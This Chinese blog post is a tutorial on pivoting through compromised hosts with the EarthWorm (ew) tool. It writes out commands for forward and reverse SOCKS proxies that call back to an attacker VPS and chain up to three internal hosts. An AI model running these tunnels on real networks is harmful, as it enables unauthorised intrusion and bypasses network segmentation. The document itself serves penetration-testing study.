SOCKS代理-EarchWorm(ew)三级级联

1.EarchWorm
测试环境如下:假设我们已经获得一台web服务器的权限,已经被我们控制的web服务器是连接内网和外网的关键节点,内网其他服务器之间均不能直接连接。
ew的升级版:GitHub:https://github.com/rootkiter/Termite
Ew共有六种命令格式,分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。
其中,ssocksd用于普通网络环境的正向连接;rcsocks、rssocks用于反弹连接;lcx_slave、lcx_listen、lcx_tran用于复杂网络环境的多级级联。
ew常用参数说明:
-l:指定要监听的本地端口
-d:指定要反弹到的机器 ip
-e:指定要反弹到的机器端口
-f:指定要主动连接的机器 ip
-g:指定要主动连接的机器端口
-t:指定超时时长,默认为 1000
(1)正向SOCKS5服务器
当目标机器拥有一个外网IP时,执行如下命令即可开启一个SOCKS代理服务。
ew -s ssocksd -l 444
(2)反向SOCKS5服务器
如果目标机器没有公网IP地址,此时我们就可以使用反向SOCKS代理。在公网VPS上添加一条转接隧道,把1080上接收到的请求转发到888端口,然后在目标web服务器上启动SOCKS服务,让其将SOCKS请求反弹到我们公网VPS的888端口,然后我们就可以通过访问公网VPS的1080端口来使用架设在目标web服务器上的SOCKS代理服务了。
vps:ew -s rcsocks -l 1080 -e 888
web:ew -s rssocks -d 1.1.1.1 -e 888
rcsocks:反弹连接的SOCKS客户端;rssocks:反弹连接的SOCKS服务端
此时只需要设置本地浏览器代理或者设置kali的proxychins即可访问目标内网服务。
(3)二级网络环境(a)
假设我们已经获得了目标网络A主机和B主机的控制权限,A主机配有两块网卡,一块可以连接外网,另一块可以只能连接内网主机B,但是A主机无法访问内网中其他资源,B主机可以访问内网资源,但是无法访问外网。
首先在B主机上,利用ew的ssocksd方式启动888端口的SOCKS代理。
ew.exe -s ssocksd -l 888
然后在A主机中执行如下命令,将1080端口收到的代理请求转发给B主机的888端口,这样就可以通过访问web服务器公网IP的1080端口使用架设在内网主机B上的SOCKS代理了。
ew -s lcx_tran -l 1080 -f 192.168.190.130 -g 888
(4)二级网络环境(b)
假设我们已经获得了目标网络A主机和B主机的权限,A主机没有公网IP且不能访问内网资源,B主机可以访问内网资源,但无法访问外网,A主机可以访问B主机。
首先在我们的公网VPS上添加转接隧道,将1080端口收到的代理请求转发给888端口。
ew -s lcx_listen -l 1080 -e 888
接着在目标B主机中使用ssocksd方式启动999端口的SOCKS代理服务。
ew -s ssocksd -l 999
最后,在目标A主机上使用lcx_slave方式将公网vps的888端口和主机B的999端口连接起来。
ew -s lcx_slave -d 1.1.1.1 -e 888 -f 192.168.190.130 -g 999
-d:要反弹连接的主机IP
-e:要反弹连接的主机端口
-f :要主动连接的主机IP
-g:要主动连接的主机端口
(5)三级网络环境
测试环境为:内网A主机没有公网IP地址,但可以访问外网;B主机不能访问外网,但可以被A主机访问;C主机可被B主机访问,且能够访问核心区域。
首先,在公网VPS上执行如下命令,将1080端口接收到的SOCKS代理请求转发到888端口。
ew -s rcsocks -l 1080 -e 888
接着在A主机上执行如下命令,将VPS的888端口和内网主机B的999端口连接起来。
ew -s lcx_slave -d 1.1.1.1 -e 888 -f 192.168.190.130 -g 999
然后在主机B上执行如下命令,将999端口接收到的代理请求转发给777端口。ew
ew -s lcx_listen -l 999 -e 777
最后,在C主机上启动SOCKS服务,并反弹到B主机的777端口上。
ew -s rssocks -d 192.168.190.130 -e 777
然后,访问公网VPS的1080端口,即可使用在C主机上假设的SOCKS代理。我们可以配置kali的proxychains代理地址为我们公网VPS的地址,然后就使用desktop连接内网主机C的远程桌面或。
 
 
posted @ 2020-02-05 19:51  micr067  阅读(1954)  评论(1编辑  收藏  举报